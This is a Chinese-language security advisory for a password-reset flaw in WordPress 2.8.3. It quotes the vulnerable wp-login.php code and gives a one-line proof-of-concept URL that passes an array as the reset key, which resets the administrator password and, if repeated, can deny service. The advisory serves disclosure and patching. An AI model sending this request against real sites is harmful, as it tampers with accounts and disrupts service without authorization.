漏洞起因
输入验证错误
影响系统
WordPress WordPress 2.8.3
不受影响系统
危害
远程攻击者可以利用漏洞重设管理员密码。
攻击所需条件
攻击者必须访问WordPress。
漏洞信息
WordPress是一款流行的blog系统。
WordPress ‘wp-login.php’存在设计错误,远程攻击者可以利用漏洞重设管理员密码。
问题存在于如下代码中:
wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
global $wpdb;
$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);
if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST[‘action’]) ? $_REQUEST[‘action’] : ‘login’;
$errors = new WP_Error();
if ( isset($_GET[‘key’]) )
$action = ‘resetpass’;
// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’, ‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false === has_filter(‘login_form_’ . $action) )
$action = ‘login’;
…[snip]….
line 370:
break;
case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET[‘key’]);
if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}
wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
exit();
break;
…[snip ]…
密码重设函数存在问题,可绕过第一步密码重设提示,提交一个数组给$key变量可重置管理员密码。
大量类似请求可导致拒绝服务攻击。
测试方法
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
厂商解决方案
可联系供应商获得补丁信息:
http://core.trac.wordpress.org/changeset/11798
漏洞提供者
Laurent Gaffie
0 条评论。